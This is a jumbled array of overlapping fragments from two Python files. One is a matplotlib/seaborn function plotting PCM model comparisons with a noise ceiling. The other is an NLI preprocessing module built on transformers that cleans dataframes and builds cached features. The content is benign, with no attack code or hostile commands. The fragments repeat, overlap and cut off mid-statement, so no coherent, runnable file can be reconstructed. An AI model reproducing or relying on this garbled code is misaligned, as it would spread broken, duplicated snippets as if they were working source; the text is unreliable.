"(matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names =",
"if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None:",
"mlines import seaborn as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make",
"noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect =",
"name of the model that define the zero-point noise_ceiling(int or string) Number or",
"out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax =",
"string) Number or name of the model that defines the noise ceiling upper_ceiling",
"@author: jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot as plt import matplotlib.patches",
"as patches import matplotlib.lines as mlines import seaborn as sb import pandas as",
"ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col",
"if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0],",
"pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame",
"the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx],",
"not None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline",
"\"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model) !=",
"baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch out the",
"xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0],",
"group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5,",
"import matplotlib.patches as patches import matplotlib.lines as mlines import seaborn as sb import",
"m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling]",
"noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper",
"noise ceiling upper_ceiling (np.array or series) Likelihood for the upper noise ceiling (usuallu",
"Likelihood for the upper noise ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis)",
"upper_ceiling (np.array or series) Likelihood for the upper noise ceiling (usuallu from group",
"upper noise ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object",
"- baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model,",
"np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling",
"None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect",
"the model that define the zero-point noise_ceiling(int or string) Number or name of",
"m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1)",
"plt import matplotlib.patches as patches import matplotlib.lines as mlines import seaborn as sb",
"the upper noise ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis",
"if noise_ceiling is not None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] #",
"Functions for visualization of PCM models, Data, and model fits @author: jdiedrichsen \"\"\"",
"baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model",
"numpy as np import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.lines",
"\"\"\" Functions for visualization of PCM models, Data, and model fits @author: jdiedrichsen",
"or string) Number or name of the model that defines the noise ceiling",
"(pd.DataFrame) Data Frame with the results (from T.likelihood) null_model (int or string) Number",
"# -*- coding: utf-8 -*- \"\"\" Functions for visualization of PCM models, Data,",
"and model fits @author: jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot as",
"ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l) ax.set_ylabel('Log Bayes Factor')",
"noise_ceiling(int or string) Number or name of the model that defines the noise",
"Number or name of the model that defines the noise ceiling upper_ceiling (np.array",
"LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim =",
"ceiling upper_ceiling (np.array or series) Likelihood for the upper noise ceiling (usuallu from",
"= likelihood - baseline.reshape(-1,1) # Stretch out the data frame LL=pd.melt(likelihood) indx =",
"(np.array or series) Likelihood for the upper noise ceiling (usuallu from group fit)",
"sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling])",
"import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood",
"else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l) ax.set_ylabel('Log Bayes Factor') return",
"utf-8 -*- \"\"\" Functions for visualization of PCM models, Data, and model fits",
"T.likelihood) null_model (int or string) Number or name of the model that define",
"seaborn as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom",
"comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with the results (from T.likelihood) null_model",
"[0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model) != str: null_model =",
"np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l",
"noise ceiling (usuallu from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\"",
"noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':')",
"sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters:",
"for visualization of PCM models, Data, and model fits @author: jdiedrichsen \"\"\" import",
"likelihood.columns.values if type(null_model) != str: null_model = m_names[null_model] if noise_ceiling is not None:",
"!=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is",
"facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l) ax.set_ylabel('Log",
"pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame)",
"-*- coding: utf-8 -*- \"\"\" Functions for visualization of PCM models, Data, and",
"string) Number or name of the model that define the zero-point noise_ceiling(int or",
"None: if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline",
"np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower),",
"not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline)",
"Number or name of the model that define the zero-point noise_ceiling(int or string)",
"noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood",
"if type(noise_ceiling) != str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline =",
"\"\"\" import numpy as np import matplotlib.pyplot as plt import matplotlib.patches as patches",
"def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with",
"= m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling) != str: noise_ceiling =",
"= m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood -",
"the noise ceiling upper_ceiling (np.array or series) Likelihood for the upper noise ceiling",
"data frame LL=pd.melt(likelihood) indx = np.logical_and(LL.model !=null_model, LL.model !=noise_ceiling) ax = sb.barplot(x=LL.model[indx], y=LL.value[indx])",
"None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6)",
"(int or string) Number or name of the model that define the zero-point",
"of the model that define the zero-point noise_ceiling(int or string) Number or name",
"= np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0],",
"!= str: null_model = m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling) !=",
"import seaborn as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model",
"the results (from T.likelihood) null_model (int or string) Number or name of the",
"not None: noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col,",
"model that defines the noise ceiling upper_ceiling (np.array or series) Likelihood for the",
"jdiedrichsen \"\"\" import numpy as np import matplotlib.pyplot as plt import matplotlib.patches as",
"as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data",
"noise_upper = np.nanmean(upper_ceiling-baseline) noiserect = patches.Rectangle((xlim[0], noise_lower), xlim[1]-xlim[0], noise_upper-noise_lower, linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect)",
"model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None): \"\"\" Make model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with the",
"baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch out the data",
"python3 # -*- coding: utf-8 -*- \"\"\" Functions for visualization of PCM models,",
"null_model (int or string) Number or name of the model that define the",
"the baseline baseline = likelihood.loc[:,null_model].values likelihood = likelihood - baseline.reshape(-1,1) # Stretch out",
"of the model that defines the noise ceiling upper_ceiling (np.array or series) Likelihood",
"object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model)",
"y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if",
"#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Functions for visualization of PCM",
"ax.get_xlim() if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not",
"fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5,",
"null_model = m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling) != str: noise_ceiling",
"patches import matplotlib.lines as mlines import seaborn as sb import pandas as pd",
"matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib.lines as mlines import seaborn",
"xlim = ax.get_xlim() if noise_ceiling is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling",
"is not None: noise_lower = np.nanmean(likelihood[noise_ceiling]) if upper_ceiling is not None: noise_upper =",
"with the results (from T.likelihood) null_model (int or string) Number or name of",
"matplotlib.lines as mlines import seaborn as sb import pandas as pd def model_plot(likelihood,null_model=0,noise_ceiling=None,upper_ceiling=None):",
"!= str: noise_ceiling = m_names[noise_ceiling] # Subtract the baseline baseline = likelihood.loc[:,null_model].values likelihood",
"str: null_model = m_names[null_model] if noise_ceiling is not None: if type(noise_ceiling) != str:",
"plot Parameters: likelihood (pd.DataFrame) Data Frame with the results (from T.likelihood) null_model (int",
"Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2]",
"the model that defines the noise ceiling upper_ceiling (np.array or series) Likelihood for",
"zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l) ax.set_ylabel('Log Bayes",
"name of the model that defines the noise ceiling upper_ceiling (np.array or series)",
"model comparisiom plot Parameters: likelihood (pd.DataFrame) Data Frame with the results (from T.likelihood)",
"= sb.barplot(x=LL.model[indx], y=LL.value[indx]) xlim = ax.get_xlim() if noise_ceiling is not None: noise_lower =",
"from group fit) Returns: ax (matplotlib.Axis.axis) Matplotlib axis object \"\"\" noise_ceil_col = [0.5,",
"linewidth=0, facecolor=noise_ceil_col, zorder=1e6) ax.add_patch(noiserect) else: l = mlines.Line2D([xlim[0], xlim[1]], [noise_lower, noise_lower],color=[0,0,0], linestyle=':') ax.add_line(l)",
"Matplotlib axis object \"\"\" noise_ceil_col = [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values",
"= [0.5, 0.5, 0.5, 0.2] m_names = likelihood.columns.values if type(null_model) != str: null_model",
"model that define the zero-point noise_ceiling(int or string) Number or name of the"
] |
[
"def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:,",
"return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in csv",
"and dev sets.\"\"\" examples = [] n = df.shape[0] for i in range(n):",
"dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label",
"\"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def",
"remove space in the first position s = s.apply((lambda x: spaces.sub(\" \", x)))",
"\"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i for i, label",
"import logging import torch import os import pandas as pd import numpy as",
"[] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b,",
"data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label =",
"pandas as pd import numpy as np from multiprocessing import Pool import random",
"result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path",
"df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join()",
"label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the",
"examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores,",
"result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result",
"from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base",
"self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map()",
"= hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples",
"Only real # tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero",
"{} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return",
"o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\"",
"= hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df",
"input text from dataframe by lowering, removing non words, removing space in the",
"= ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id]",
"\"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids,",
"mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features",
"l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion",
"word x :param x: word :type x: str :return: word withou space in",
"= data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]',",
"data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_)",
"[ 1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the",
"attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids",
"* len(input_ids) # Zero-pad up to the sequence length. padding_length = max_length -",
"features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def",
":param data: data frame with the colum 'text' :type data: pd.DataFrame \"\"\" new_p",
"\"\"\" remove_first_space from word x :param x: word :type x: str :return: word",
"str \"\"\" try: if x[0] == \" \": return x[1:] else: return x",
"with the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column:",
"text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s =",
"features in file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores)",
"n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file)",
"in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset =",
"cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long)",
"def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result =",
"df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor):",
"def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero",
"features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask",
"df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to",
"for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids, all_labels) return",
"first position and removing double spaces :param data: data frame with the colum",
"max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) ==",
"path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\",",
"max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map",
"= filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self,",
"torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f",
"class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in csv (columns =",
"n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def",
"if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length)",
"double spaces :param data: data frame with the colum 'text' :type data: pd.DataFrame",
"a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func,",
"s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces return",
"for padding tokens. Only real # tokens are attended to. attention_mask = [",
"return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the",
"return result def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type",
"import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO)",
"def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def",
"get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self,",
"else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path",
"([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1] *",
"x :param x: word :type x: str :return: word withou space in front",
"version of the dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:,",
"s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda x:",
"= self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self,",
"parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to a",
"InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length",
"the dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] =",
"removing space in the first position and removing double spaces :param data: data",
"self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples",
"features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels =",
"padding_length) assert len(input_ids) == max_length, \"Error with input length {} vs {}\".format( len(input_ids),",
"= data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return",
"\"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close()",
"df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type)",
"hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples =",
"the any nli dataf frame in csv (columns = premise | hypothesis |",
"clean version of the dataframe with the original index \"\"\" df_new = df.copy()",
"parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new =",
"for real tokens and 0 for padding tokens. Only real # tokens are",
"= self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\")",
"import re import logging import torch import os import pandas as pd import",
"input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens",
"token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores)",
"= input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if",
"'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s",
"path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if",
"max_length) assert len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format( len(token_type_ids),",
"x: str :return: word withou space in front :rtype: str \"\"\" try: if",
"self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def",
":param x: word :type x: str :return: word withou space in front :rtype:",
"with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new",
"# noqa s = s.apply(remove_first_space) # noqa remove space in the first position",
"df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in",
"{}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length {} vs",
"result def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type x:",
"= merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word",
"file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in",
"'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version",
"* padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) ==",
"in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to",
"torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file",
"all input text from dataframe by lowering, removing non words, removing space in",
"length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input",
"features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset(",
"df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in csv (columns",
"df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied",
"x))) # noqa s = s.apply(remove_first_space) # noqa remove space in the first",
"if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] *",
"[f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in",
"= parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path =",
"* padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids",
"= Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\"",
"def clean_df(df, n_cores): \"\"\" return clean version of the dataframe with the original",
"len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length {} vs {}\".format(",
"mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length)",
"the first position and removing double spaces :param data: data frame with the",
"return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file)",
"\"\"\"Creates examples for the training and dev sets.\"\"\" examples = [] n =",
"applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df",
"attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features,",
"new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations",
"import os import pandas as pd import numpy as np from multiprocessing import",
"return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df,",
"observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\"",
"for i in range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type,",
"dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor(",
"= \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def",
"dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids,",
"s = s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) #",
"name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label)",
"len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"],",
"+') def merge_lists(lists): base = [] for l in lists: base.extend(l) return base",
"to. attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad",
"assert len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length)",
"up to the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids",
"vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features",
"if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores)",
"data: data frame with the colum 'text' :type data: pd.DataFrame \"\"\" new_p =",
"= hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero =",
"\", x))) # noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply",
"space in the first position s = s.apply((lambda x: spaces.sub(\" \", x))) #",
":rtype: str \"\"\" try: if x[0] == \" \": return x[1:] else: return",
